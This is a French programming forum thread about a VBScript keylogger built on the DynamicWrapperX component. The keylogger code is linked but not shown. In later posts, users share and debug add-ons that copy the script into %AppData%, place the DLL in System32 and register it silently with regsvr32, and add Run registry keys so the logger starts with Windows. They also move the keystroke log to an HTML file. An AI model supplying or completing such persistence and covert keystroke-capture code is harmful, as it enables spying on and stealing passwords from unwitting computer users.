IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Vos Contributions VBScript Discussion :

un keylogger avec dynamicwrapperx


Sujet :

Vos Contributions VBScript

  1. #1
    Rédacteur
    Avatar de omen999
    Profil pro
    Inscrit en
    février 2006
    Messages
    1 276
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : février 2006
    Messages : 1 276
    Points : 3 448
    Points
    3 448
    Par défaut un keylogger avec dynamicwrapperx
    bonjour,
    tout est dans le titre
    ce code nécessite l'enregistrement du composant dynamicwrapperx
    les touches au format de l'instruction sendkeys sont enregistrées par défaut dans un fichier dénommé keylog.txt situé dans le répertoire de démarrage du script
    la sortie du keylogger se fait par la combinaison Maj + Esc
    c'est une version beta donc les observations et autres "bug reports" sont les bienvenus
    les tests se font évidemment aux risques et périls de leur utilisateur

    voir le code
    nomen omen, nemo non omen - Consultez la FAQ VBScript et les cours et tutoriels VBScript
    le plus terrible lorsqu'une voiture renverse un piéton, c'est que ce sont les freins qui hurlent. (ramón)
    pas de questions techniques par mp

  2. #2
    Futur Membre du Club
    Inscrit en
    juin 2010
    Messages
    4
    Détails du profil
    Informations forums :
    Inscription : juin 2010
    Messages : 4
    Points : 5
    Points
    5
    Par défaut
    salut a tous

    je crois qu'il est incomplet car il n'enregistre pas toutes les frappes du clavier,

    ya pas de moyen pour qu'il les enregistre tous.

    merci

  3. #3
    Rédacteur
    Avatar de omen999
    Profil pro
    Inscrit en
    février 2006
    Messages
    1 276
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : février 2006
    Messages : 1 276
    Points : 3 448
    Points
    3 448
    Par défaut
    salut,
    ya pas de moyen pour qu'il les enregistre tous.
    soit + précis, ma boule de cristal est hs
    certaines touches ou combinaisons de touches ne sont jamais enregistrées
    ou/et
    certaine touches sont aléatoirement ignorées dans certaines conditions:
    - frappe rapide
    - charge cpu importante
    ou autres à préciser...
    nomen omen, nemo non omen - Consultez la FAQ VBScript et les cours et tutoriels VBScript
    le plus terrible lorsqu'une voiture renverse un piéton, c'est que ce sont les freins qui hurlent. (ramón)
    pas de questions techniques par mp

  4. #4
    Futur Membre du Club
    Inscrit en
    juin 2010
    Messages
    4
    Détails du profil
    Informations forums :
    Inscription : juin 2010
    Messages : 4
    Points : 5
    Points
    5
    Par défaut
    salut

    desoler le probleme vient de mon system , je l'ai tester dans un autre ordi il marche bien.. je croit parceque j'utilise un systeme virtuel 'virtualbox' dont windows n'est pas installer correctement..

    mais je voulais lui ajouter pour que le keylogger soit lancer au demarrage de windows en ajoutant ce code:

    Set WshShell = CreateObject("WScript.Shell")
    WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\keylogger", "C:\ chemin du programme"
    Set WshShell = Nothing

    et qu'on j'ajoute le code le keylogger marche bien mais qu'on je verifie dans le registre de windows avec executer puis regedit:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ il n'a pas ete ajouter ,je voulais savoir ou mettre ce code pour qu'il fonctionne bien et que le programme soit lancer au demarrage de windows.
    merci d'avance...




  5. #5
    Rédacteur
    Avatar de omen999
    Profil pro
    Inscrit en
    février 2006
    Messages
    1 276
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : février 2006
    Messages : 1 276
    Points : 3 448
    Points
    3 448
    Par défaut
    sous virtualbox, certaines fonctions api ne doivent pas être fonctionnelles
    en ce qui me concerne (sur xp sp3) ce code écrit bien la valeur de démarrage dans le registre
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\keylogger", "C:\ chemin du programme"
    nomen omen, nemo non omen - Consultez la FAQ VBScript et les cours et tutoriels VBScript
    le plus terrible lorsqu'une voiture renverse un piéton, c'est que ce sont les freins qui hurlent. (ramón)
    pas de questions techniques par mp

  6. #6
    Futur Membre du Club
    Inscrit en
    juin 2010
    Messages
    4
    Détails du profil
    Informations forums :
    Inscription : juin 2010
    Messages : 4
    Points : 5
    Points
    5
    Par défaut
    salut....
    oui le code marche bien puisque en le met dans un autre fichier.vbs qui est separer de votre code keylogg , mais je veut savoir ou on peut l'ajouter au seins de votre code pour qu'il marche, c a dir dans le meme fichier 'keylogger.vbs' , je l'ai ajouter dans les derniere lignes: le keylogg marche tres bien mais le code que j'ai ajouter n'a pas modifier la valeur de démarrage dans le registre..

  7. #7
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    juin 2009
    Messages
    3 731
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 46
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : juin 2009
    Messages : 3 731
    Points : 9 021
    Points
    9 021
    Par défaut
    Citation Envoyé par omen999 Voir le message
    bonjour,
    tout est dans le titre
    ce code nécessite l'enregistrement du composant dynamicwrapperx
    les touches au format de l'instruction sendkeys sont enregistrées par défaut dans un fichier dénommé keylog.txt situé dans le répertoire de démarrage du script
    la sortie du keylogger se fait par la combinaison Maj + Esc
    c'est une version beta donc les observations et autres "bug reports" sont les bienvenus
    les tests se font évidemment aux risques et périls de leur utilisateur

    voir le code
    Salut,
    J'ai ajouter quelques lignes dans ton script dans le but de le faire exécuter en démarrage automatique avec windows et d'enregistrer le composant "dynwrapx.dll" en mode Silencieux.Pour L'inscription du Script dans la Base de registre en Démarrage automatique ca marche trés bien, mais j'ai rencontrer un petit problème dans l'enregistrement de ce dernier.
    Le message d'erreur est : "dynwrapx.dll" n'est pas un fichier exécutable et aucune application d'assistance d'enregistrement n'est enregistré pour ce type de fichier
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    '--Copie du script et du composant DynamicWrapperX et inscription et dans la Base de registre pour Le démarrage Automatique--
    dim file,destfile,AppData,System32,Command,Enreg,HKLM
    Set ws = WScript.CreateObject("WScript.Shell")
    AppData= ws.ExpandEnvironmentStrings("%AppData%")
    set file = CreateObject ("Scripting.FileSystemObject")
    Set FSO = WScript.CreateObject("Scripting.FileSystemObject")
    set destfile = file.GetFile(Wscript.ScriptFullName)
    Set System32 = FSO.GetSpecialFolder(1)
    HKLM = "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"
    if (not fso.fileexists(AppData & "\" & Wscript.ScriptName)) then
    		destfile.Copy(AppData & "\" & Wscript.ScriptName)
    	end if
    	if  fso.fileexists(AppData & "\" & Wscript.ScriptName) then 'Pour La Mise à jour du script :il écrase l'ancien et copie le nouveau
    		destfile.Copy(AppData & "\" & Wscript.ScriptName)
    	end if
     
    if (not fso.fileexists(System32 & "\dynwrapx.dll")) then
    		destfile.Copy(System32 & "\dynwrapx.dll")
    	end if
    '--Commande pour inscrire le composant dynwrapx.dll en mode silencieux en utilisant l'option regsvr32 /S
    'Command = "CMD /C regsvr32 /s dynwrapx.dll" 
    	Command = "CMD /C regsvr32 dynwrapx.dll" 
    	Enreg = ws.Run(Command,0,True) 
    '----inscription dans la Base de registre pour Le démarrage Automatique----
    ws.RegWrite HKLM & "Keylogger", AppData & "\" & Wscript.ScriptName
    Je ne sais pas si l'erreur vient de mon système sous "Windows XP SP3" ou bien il y a une erreur dans la syntaxe de la commande suivante:

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    Command = "CMD /C regsvr32 dynwrapx.dll"

  8. #8
    Rédacteur
    Avatar de omen999
    Profil pro
    Inscrit en
    février 2006
    Messages
    1 276
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : février 2006
    Messages : 1 276
    Points : 3 448
    Points
    3 448
    Par défaut
    salut,
    je vois que tu as de la suite dans les idées depuis le temps que tu cherchais un keylogger...
    ton code testé fonctionne sans problème chez moi (xp sp3) y compris la version silencieuse
    le message d'erreur renvoyé par regsvr32 signifie qu'il n'identifie pas dynwrapx.dll comme un fichier portable executable conforme
    ton fichier dynwrapx doit être corrompu
    nomen omen, nemo non omen - Consultez la FAQ VBScript et les cours et tutoriels VBScript
    le plus terrible lorsqu'une voiture renverse un piéton, c'est que ce sont les freins qui hurlent. (ramón)
    pas de questions techniques par mp

  9. #9
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    juin 2009
    Messages
    3 731
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 46
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : juin 2009
    Messages : 3 731
    Points : 9 021
    Points
    9 021
    Par défaut
    Citation Envoyé par omen999 Voir le message
    salut,
    je vois que tu as de la suite dans les idées depuis le temps que tu cherchais un keylogger...
    ton code testé fonctionne sans problème chez moi (xp sp3) y compris la version silencieuse
    le message d'erreur renvoyé par regsvr32 signifie qu'il n'identifie pas dynwrapx.dll comme un fichier portable executable conforme
    ton fichier dynwrapx doit être corrompu
    Salut,
    Pour le composant dynwrapx.dll c'est résolu Merci bien
    Maintenant j'ai changer le fichier journal Texte en fichier journal HTML.
    Pour la 1ère Exécution du script ca marche bien càd il enregistre bien les frappes tapés au clavier mais pour la 2éme exécution il affiche des caractères Chinois illisible je comprends pas pourquoi ??
    Voila le code ajouté
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    If Not FSO.FileExists(AppData & "\keylog.htm") Then
    Set oKeyLog = Fso.CreateTextFile(AppData & "\keylog.htm",ForWriting, True)
    oKeyLog.write "<body bgcolor=#000000 text=#Green link=#336699 vlink=#336699 alink=#336699>"
    else 
    Set oKeyLog = Fso.OpenTextFile(AppData & "\keylog.htm", ForAppending, True)
    end if
    et voila le résultat affiché dans la pièce-jointe

  10. #10
    Rédacteur
    Avatar de omen999
    Profil pro
    Inscrit en
    février 2006
    Messages
    1 276
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : février 2006
    Messages : 1 276
    Points : 3 448
    Points
    3 448
    Par défaut
    et voila le résultat affiché dans la pièce-jointe
    ça signifie juste que le viewer utilisé l'interprète comme du Unicode
    il faudrait le visualiser en hexa pour l'analyser
    nomen omen, nemo non omen - Consultez la FAQ VBScript et les cours et tutoriels VBScript
    le plus terrible lorsqu'une voiture renverse un piéton, c'est que ce sont les freins qui hurlent. (ramón)
    pas de questions techniques par mp

  11. #11
    Nouveau Candidat au Club
    Homme Profil pro
    Programeur omni langages non professionnel
    Inscrit en
    mars 2013
    Messages
    1
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Yvelines (Île de France)

    Informations professionnelles :
    Activité : Programeur omni langages non professionnel

    Informations forums :
    Inscription : mars 2013
    Messages : 1
    Points : 1
    Points
    1
    Par défaut 800A01AD
    Bonsoir,
    Désolé pour la rapidité de mon message mais je suis HS, il est super tard..
    J'essaie de faire un mot de passe invisible, donc un script en background qui détect une certaine combinaison de touche. Donc comme j'ai des connaissances moyennes en vbs (je sais bien utiliser des scripts que je trouve, je connais les bases mais je suis perdu pour les création d'objets etc), je me suis dit que partir sur la base d'un Keylogger etait une bonne piste. Mais, après installation de la dll en 32 et 64 bits ainsi qu'en copiant dynamicwrapx.dll dans System32 et syswow64, j'ai toujours une erreur; que ce soit avec wscript.exe ou cscript.exe.
    J'ai la fenêtre d'erreur suivante:

    Nom : hpHbr.png
Affichages : 849
Taille : 8,0 Ko
    ( http://puu.sh/hpHbr.png )
    Je suis d'autant plus paumé, du coup.Quelqu'un peut m'aider? Svp

    PS: (Pour vous expliquer l'idée, au cas ou cela intéresse quelqu'un:
    J'ai vu un hacker de la Defcon qui expliquait comment il avait réussi à récupérer son ordinateur volé grâce à d'énormes failles qu'il avait ouvertes dessus auparavant; le problème, c'est qu'il faut laisser ces failles ouvertes en permanence juste "au cas ou". Donc j'ai décidé de créer un petit programme qui ouvre ces failles si l'on ne fait pas une petite manip à chaque démarrage, donc dont que le possesseur de l'ordi est le seul à être au courant. Ainsi, si et seulement si on vole votre ordinateur des failles seront ouvertes pour vous permettre d'identifier et retrouver le voleur -à condition qu'il se serve au moins une fois de l'ordinateur en l'état et qu'il se connecte à un réseau.)


    Merci merci!

Discussions similaires

  1. Programmer un keylogger avec TASM ?
    Par original12 dans le forum x86 32-bits / 64-bits
    Réponses: 1
    Dernier message: 16/03/2013, 23h45
  2. [langage] Comparer Perl avec d'autres langages comme C ?
    Par Anonymous dans le forum Langage
    Réponses: 3
    Dernier message: 10/08/2002, 23h52
  3. Problème avec la mémoire virtuelle
    Par Anonymous dans le forum CORBA
    Réponses: 13
    Dernier message: 16/04/2002, 16h10
  4. [Kylix] Runtime error 230 avec INDY
    Par Anonymous dans le forum EDI
    Réponses: 2
    Dernier message: 23/03/2002, 11h51
  5. Réponses: 2
    Dernier message: 20/03/2002, 23h01

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo